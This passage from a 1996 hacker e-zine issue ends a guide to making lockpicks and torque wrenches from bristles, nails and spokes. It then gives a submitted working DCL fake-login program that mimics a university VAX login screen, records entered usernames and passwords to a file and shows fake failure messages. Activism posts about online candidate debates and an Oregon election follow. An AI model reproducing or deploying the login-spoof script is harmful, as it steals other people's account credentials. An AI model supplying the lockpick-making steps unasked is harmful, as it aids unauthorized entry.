wrench determines how well it will fit the keyway. Locks with narrow keyways (e.g. desk locks) need torque wrenches with narrow heads. Before bending the bristle, file the head to the desired width. A general purpose wrench can be made by narrowing the tip (about 1/4 inch) of the head. The tip fits small keyways while the rest of the head is wide enough to grab a normal keyway. . The hard part of making a torque wrench is bending the bristle without cracking it. To make the 90 degree handle twist, clamp the head of the bristle (about one inch) in a vise and use pliers to grasp the bristle about 3/8 of an inch above the vise. You can use another pair of pliers instead of a vise. Apply a 45 degree twist. Try to keep the axis of the twist lined up with the axis of the bristle. Now move the pliers back another 3/8 inch and apply the remaining 45 degrees. You will need to twist the bristle more than 90 degrees in order to set a permanent 90 degree twist. . To make the 80 degree head bend, lift the bristle out of the vise by about 1/4 inch (so 3/4 inch is still in the vise). Place the shank of a screw driver against the bristle and bend the spring steel around it about 90 degrees. This should set a permanent 80 degree bend in the metal. Try to keep the axis of the bend perpendicular to the handle. The screwdriver shank ensures that the radius of curvature will not be too small. Any rounded object will work (e.g. drill bit, needle nose plies, or a pen cap). If you have trouble with this method, try grasping the bristle with two pliers separated by about 1/2 inch and bend. This method produces a gentle curve that won't break the bristle. . A grinding wheel will greatly speed the job of making a pick. It takes a bit of practice to learn how to make smooth cuts with a grinding wheel, but it takes less time to practice and make two or three picks than it does to hand file a single pick. The first step is to cut the front angle of the pick. Use the front of the wheel to do this. Hold the bristle at 45 degrees to the wheel and move the bristle side to side as you grind away the metal. Grind slowly to avoid overheating the metal, which makes it brittle. If the metal changes color (to dark blue), you have overheated it, and you should grind away the colored portion. Next, cut the back angle of the tip using the corner of the wheel. Usually one corner is sharper than the other, and you should use that one. Hold the pick at the desired angle and slowly push it into the corner of the wheel. The side of the stone should cut the back angle. Be sure that the tip of the pick is supported. If the grinding wheel stage is not close enough to the wheel to support the tip, use needle nose pliers to hold the tip. The cut should pass through about 2/3 of the width of the bristle. If the tip came out well, continue. Otherwise break it off and try again. You can break the bristle by clamping it into a vice and bending it sharply. . The corner of the wheel is also used to grind the tang of the pick. Put a scratch mark to indicate how far back the tang should go. The tang should be long enough to allow the tip to pass over the back pin of a seven pin lock. Cut the tang by making several smooth passes over the corner. Each pass starts at the tip and moves to the scratch mark. Try to remove less than a 1/16th of an inch of metal with each pass. I use two fingers to hold the bristle on the stage at the proper angle while my other hand pushed the handle of the pick to move the tang along the corner. Use whatever technique works best for you. . Use a hand file to finish the pick. It should feel smooth if you run a finger nail over it. Any roughness will add noise to the feedback you want to get from the lock. . The outer sheath of phone cable can be used as a handle for the pick. Remove three or four of the wires from a length of cable and push it over the pick. If the sheath won't stay in place, you can put some epoxy on the handle before pushing the sheath over it. A.3 Bicycle Spokes . An alternative to making tools out of street cleaner bristles is to make them out of nail and bicycle spokes. These materials are easily accessible and when they are heat treated, they will be stronger than tools made from the bristles. . A strong torque wrench can be constructed from an 8-penny nail (about .1 inch diameter). First heat up the point with a propane torch until it glows red, slowly remove it from the flame, and let it air cool; this softens it. The burner of a gas stove can be used instead of a torch. Grind it down into the shape of a skinny screwdriver blade and bend it to about 80 degrees. The bend should be less than a right angle because some lock faces are recessed behind a plate (called an escutcheon) and you want the head of the wrench to be able to reach about half an inch into the plug. Temper (harden) the torque wrench by heating to bright orange and dunking it into ice water. You will wind up with a virtually indestructible bent screwdriver that will last for years under brutal use. . Bicycle spokes make excellent picks. Bend one to the shape you want and file the side of the business end flat such that it's strong in the vertical and flexy in the horizontal direction. Try a right-angle hunk about an inch long for a handle. For smaller picks, which you need for those really tiny keyways, find any large-diameter spring and unbend it. If your careful you don't have to play any metallurgical games. A.4 Brick Strap . For perfectly serviceable key blanks that you can't otherwise find at the store, use the metal strap they wrap around bricks for shipping. It's wonderfully handy stuff for just about anything you want to manufacture. To get around side wards in the keyway, you can bend the strap lengthwise by clamping it in a vice and tapping on the protruding part to bend the piece to the required angle. . Brick strap is very hard. It can ruin a grinding wheel or key cutting machine. A hand file is the recommended tool for milling brick strap. ... -= END OF FILE =- * Origin: Combat Arms BBS - Portland, OR - (503) 221-1777 (1:105/68) * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #5 of 8 ... Yet Another Login Spoof ....Brent Barnhill >From 0211065@ACAD.NWMISSOURI.EDUWed Jan 24 13:08:04 1996 Date: Mon, 22 Jan 1996 16:52:08 -0600 (CST) From: "HI...JUST THOUGHT I WOULD DROP BY" <0211065@ACAD.NWMISSOURI.EDU> To: mrs3691@hertz.njit.edu Subject: fake login program Hey there. I heard that you are the person to contact to submit hacker's programs. Well, I just made a wonderful fake login program in DCL. The program is supposed to work if someone lets someone else use my account to telnet to my school and login. Well, here it is: $ wait 00:00:02 $ set message/id/sev/facil/text $ W :== Write sys$output $ TI :== Type sys$input $ TI Trying... Connected to ACAD.NWMISSOURI.EDU. $ W "" $ W "" $ W "" $ TI Welcome to Northwest Missouri State University. Current access is to a VAX Cluster on Node S0. Missouri statutes prohibit computer tampering. $ W "" $ read/prompt = "Username: " sys$command username $ set term/noecho $ read/prompt = "Password: " sys$command password $ set term/echo $ open/write log d3:[211065]log.txt $ write log username, " " $ write log password, " " $ close log $ inquire/nopunctuation sel "User authorization failure.[26D" $ if sel .eqs. "" then goto asdf $ asdf: $ read/prompt = "Username: " sys$command username $ set term/noecho $ read/prompt = "Password: " sys$command password $ set term/echo $ open/write log d3:[211065]log.txt $ write log username, " " $ write log password, " " $ close log $ inquire/nopunctuation sel "User authorization failure.[26D" $ if sel .eqs. "" then goto klll $ klll: $ read/prompt = "Username: " sys$command username $ set term/noecho $ read/prompt = "Password: " sys$command password $ set term/echo $ open/write log d3:[211065]log.txt $ write log username, " " $ write log password, " " $ close log $ TI User authorization failure $ W "" $ TI Connection closed by Foreign Host $ bye Here is my wonderful info: Brent Barnhill or "Hey" (816) 562-6237 314 Dieterich http://www.nwmissouri.edu/~0211065 PLEASE FINGER ME SINCE I HAVE "TONS" OF FREE COOL STUFF!!! Have a wonderful day! Brent :) * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #6 of 8 ... A Request for Action .... Jim Warren I'm sending this to a journalists listserv and to various personal contacts in the press, as well as to my GovAccess subscribers. It is highly time-sensitive. Please ... accept this as a personal note. Please ... RECIRCULATE it, widely.] Folks, There's a time to read and contemplate. There's a time to discuss and debate and haggle -- with peers who have about the equal power as you have over the nation's future. And there's a time to ACT -- to DO SOMETHING! To IMPROVE OUR POTENTIAL FUTURE. Please ... I urge you ... I implore you -- Act NOW. It is obvious that we MUST act. We MUST move our nation's "leaders" -- sometimes fearfully kicking and screaming -- into the Information Age. We must demand that those who wish to lead us must drive the "information superhighways" that they are so zealously, piously -- and *ignorantly* -- attempting to police. We MUST make them aware of the net's power as a tool of freedom and democracy -- and effective grassroots action -- before they destroy its potential. For they are endangering us all, through posturing stupidity and self-rightous arrogance. That we MUST act is obvious from numerous examples. To name just a few: * The administrations' (plural) zealous, continuing suppression of standardized personal privacy protection for communications and files -- via globally- published, freely-available robust cryptography; blockading needed privacy for business and citizens -- who are now "presumed innocent" *only* during trial; only *after* being arrested and indicted; * Last year's half-billion-dollar wiretap law, that forces every telephone company to make our nation wiretap-ready for whichever facist first chooses to abuse that awsome power; * This year's successful efforts to make the government into our parent and overseer -- a federal daddy censoring all that we say or see, if we dare to use any "telecommunications device" (and it *doesn't* just censoring the net!); * The just-passed Telecommunications Deform Act -- that grants so much freedom to those giant corporations who paid so much to those who voted ... freedom to create cartels, to price-gouge where they have functional monopolies, to sell our electronic news media to unscrupulous foreigners, and to allow whichever media giant has the most money to buy control of and monopolize the print and broadcast news channels in any geographic area; and * The legislation by senior Republican Congressman Henry Hyde, just reported in net email, that would allegedly classify all abortion information -- *medical*, social or political -- as "obscene," prohibiting its discussion using any telecomm device, including telephones and the net. (And that's not as draconian as what other senior "leaders" have proposed!) YOU -- each of us -- CAN help presidential candidates better understand the net: PRESIDENTIAL CANDIDATES ONLINE DEBATE, NOW! As one tiny step for those asking to "lead" us into the 21st Century and the Information Age -- to help them understand the net's potential -- I have invited presidential candidates to participate in a week of online debate (requiring only a few minutes daily; from any place; at any time; presumably/hopefully with their staff doing the typing). Each day, the candidates themselves, will question each other, followed by their responses and then by rebuttals -- all of limited length submitted within agreed-upon daily time limits, with pointers to additional online information if they desire. As the most significant current target of opportunity, I proposed the debate for the Republican primary's presidential candidates. Because the driving force of their competition is likely to end after the Iowa caucuses (2/12) and the New Hampshire primaries (2/20), I proposed that the debates begin next Monday, Feb. 5th, and conclude Feb.11th. If we can set the precedent with the Republicans, now, then substantive online presidential debates will be likely prior to next November's general elections. If the primary debate doesn't happen now, it seems likely that major presidential candidates will not debate online until the next century! MAJOR NATIONAL NEWS MEDIA COOPERATING The U.S. NEWS & WORLD REPORT, Knight-Ridder's MERCURY CENTER at the SAN JOSE MERCURY NEWS, and New Jersey's second-largest newspaper, the ASHBURY PARK PRESS, have all agreed to carry any substantive presidential debate on their public websites, and others are likely. (As a data-point, Mercury Center typically gets 300,000 to 400,000 hits per day, and tops 500,000 on "hot" news days.) Numerous reporters, columnists and editors with mainstream media have said that they would cover any substantive online debate that included major candidates. Today, Reuters carried a major story about the proposed debate, and others will appear shortly in U.S. NEWS & WORLD REPORT and in the NATIONAL JOURNAL -- among others. THREE CANDIDATES HAVE ACCEPTED -- BUT FIVE OTHERS REMAIN UNCOMMITED Lugar, Taylor and Collins have already sent signed commitments to participate. Another candidate said no; another said yes and signed -- then reneged (below). The agreement is that the debate will occur only if there are at least four candidates. And, unless at least one more "major" candidate joins the debate, it's doubtful that the press will consider it substantive and worth significant coverage. The remaining candidates *must decide by NEXT MONDAY*!! Please -- help them: ASK THOSE WHO WOULD BE OUR PRESIDENT TO PARTICIPATE IN OUR FUTURE -- NOW The non-commited candidates will participate only if they believe that (1) lots of people [voters] are interested, and (2) the press is likely to cover it. (The press *will* cover it, *if* several of the "major" candidates participate.) As a voter, please ... .1. Phone, fax and email the candidates, NOW, asking them to participate .-- if they want us to believe they are competent to lead us into the .Information Age. .2. Email this message to every person you know who lives or works in .Iowa or New Hampshire (e.g., *all* the staff at the numerous computer .magazines in NH!). .Please - do it NOW! Yes, the campaign managers *are* working day and night and through the weekend. Let's demonstrate the power of the net -- before arrogance or stupidity demolishes its power and potential. Thanks for reading. --jim Jim Warren, GovAccess list-owner/editor (jwarren@well.com) Member, Freedom-of-Information Committee, Soc. of Prof. Journalists - Nor. Cal. Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc. 345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request> [puffery: John Dvorak Lifetime Achievement Award (1995); James Madison Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal. (1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994); Pioneer Award, Electronic Frontier Foundation (its first year, 1992); founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).] Lamar Alexander: 615-327-3350; fax/615-340-0397, Campaign Mgr Dan Pero .lamar@Nashville.net .http://www.lamar.com/~lamar/ Phil Gramm: 202-467-8600; fax/202-467-8696, Campaign Mgr Jeb Hensarling .info@gramm96.org .http://www.gramm96.com/ Pat Buchanan: 703-848-1996; fax/703-827-0592, Campaign Mgr Terry Jeffries .lmuller@iquest.com .http://www.buchanan.org/ Bob Dole: 202-414-6400; fax/202-408-9446, Campaign Mgr Scott Reed .[apparently no email except via webpage] .http://www.dole96.org/ Steve Forbes: 908-781-5111 [the best # I've found]; fax/908-781-6001 .forbes@forbes96.com .http://www.forbes96.com/ Those who have commited to debate: Dick Lugar: fax/317-931-4106, Mark Lubbers <== WILL debate! .rgl@iquest.net .http://www.iquest.com/lugar/ Charles Collins: 912-994-8219; fax/912-994-7995, George Gruner <== WILL debate! .[may be] http://computek.net/public/collins/collins.html Morry Taylor: fax/515-264-7510, Campaign Mgr Bill Kenyon <== WILL debate! .TPresident@aol.com .http://www.webcom.com/~morry96/ Those who have delined or reneged (might be worth email or a call): Bob Dornan: fax/703-644-5117, Campaign Mgr Terri Cobban <== "Yes," then "No." .[I have a staffer's email address, but I believe it's nor public] .[may be] http://www.umr.edu/~sears/primary/dornan.html Alan Keyes: 503-463-1818; fax/602-263-7790, Nat'l Polit.Dir George Uribe <== NO. .GeoUribe@aol.com .http://www.keyes.gocin.com/ Keyes campaign manager sent email saying, "I do like the concept and so does Ambassador Keyes. Unfortunately we can't spare a week for a staffer to service the program." (Yes, we spoke and I explained how online forums operate, and how easily they can be done using minimal and flexible time.) Dornan campaign manager Terri Cobban verbally agreed to debate, twice -- two days apart -- and they later faxed a written commitment, signed explicitly by "Bob Dornan." But on Wednesday afternoon (1/31), Cobban called and said they were cancelling. When I asked for a signed fax confirming this, she said, "No, I feel a verbal statement is sufficient at this time." Mo' as it Is. --jim Jim Warren, GovAccess list-owner/editor (jwarren@well.com) Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc. 345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request> To add or drop GovAccess, email to Majordomo@well.com ('Subject' ignored) with message: [un]subscribe GovAccess YourEmailAddress (insert your eaddr) For brief description of GovAccess, send the message: info GovAccess Past postings are at ftp.cpsr.org: /cpsr/states/california/govaccess and by WWW at http://www.cpsr.org/cpsr/states/california/govaccess . Also forwarded to USENET's comp.org.cpsr.talk by CPSR's Al Whaley. May be copied & reposted except for any items that explicitly prohibit it. * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #7 of 8 .. Cyberspace Makes the Difference .. Voter's Telecommunications Watch FOR IMMEDIATE RELEASE FEBRUARY 1, 1996 ..... Contact: Steven Cherry ...... (201) 596-2851 .......stc@vtw.org ...... Shabbir Safdar ...... (718) 596-2851 ...... shabbir@vtw.org ........ New York, NY ........ . RON WYDEN WINS SPECIAL OREGON SENATE ELECTION .. INTERNET ACTIVIST GROUP CLAIMS ... SHARE OF SUCCESS Voter's Telecommunications Watch, an on-line civil liberties group announced today that the closeness of the vote in Oregon's special Senate election justified the attention given to the cyberspace vote by the Wyden campaign. Wyden's 1% margin of victory represented fewer than 20,000 votes. Wyden took pains to make his campaign accessible to Internet voters through on-line appearances, an Internet account that answered voter email promptly, by maintaining an active World Wide Web site, and by being the first candidate in the 1996 election season to answer VTW's Technology Pledge. The pledge consists of four questions that probe a candidate's stand on the central cyberliberties issues of the day. Wyden, currently serving in the House of Representatives, not only answered all four Pledge questions in the affirmative, he was able to point to a Congressional legislative record that supported those answers. VTW and the Oregon on-line community widely circulated the answers of three candidates to the pledge questionnaire, and received testimony from many voters that the relative stands of the candidates on these telecommunications issues determined their vote. VTW looks forward to Wyden's contributions to telecommunications and civil liberties issues shifting from the House to the Senate. It is also encouraged that by helping to draw attention to the positions of candidates throughout the 1996 elections, citizens involved in the on-line world will make their voices heard in the voting booth. Voters Telecommunications Watch is a volunteer organization, concentrating on legislation as it relates to telecommunications and civil liberties. VTW publishes a weekly BillWatch that tracks relevant legislation as it progresses through Congress. It publishes periodic Alerts to inform the about immediate action it can take to protect its on-line civil liberties and privacy. The Wyden campaign can still be contacted on-line or off- at: Wyden for Senate Sue Castner, Press Representative PO Box 3498, Portland, OR 97208 503-248-9567, fax: 503-248-9890 wyden@teleport.com http://www.teleport.com/~wyden More information about VTW can be found on-line at gopher -p 1/vtw gopher.panix.com www: http://www.vtw.org or by writing to vtw@vtw.org. The press can call (718) 596-2851 or contact: Shabbir Safdar Steven Cherry shabbir@vtw.org stc@vtw.org * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #8 of 8 .... The End .There it goes again. Another issue came and went, and 30 more days must come and go before the next fix of Hackers can be injected into your blood stream. If you need to talk to somebody before than, I should be on the Defcon bridge now and then, and the 2600 voice BBS. As always, I'm at mrs3691@hertz.njit.edu, (201) 565-9145, 621A Redwood Hall, 186 Bleeker St., Newark, NJ, 07103. The official web site is still http://hertz.njit.edu/~mrs3691, and the official ftp site is still infonexus.com. .In your lab, tinkering with the inner flesh of the phone system, toying with the defense networks of foreign countries, are you frustrated because your work is taken for granted by huge corporations who pay well but offer none of that feeling of accomplishment and awe that you desire so much? Then submit an article to Hackers, and receive the recognition you so deserve. .I haven't decided whether the no-prize will be all the parts necessary to build a beige box that aren't included in a normal phone, or a real live visit with an intelligent Bell Atlantic Operator. But you have to submit to win! So hopefully next issue will be chock full of ideas for those of us with way too much consumer electronics lying around, and not enough to do with it. .See you next month, and wherever you hack, may the ethic be with you. .......- Revolution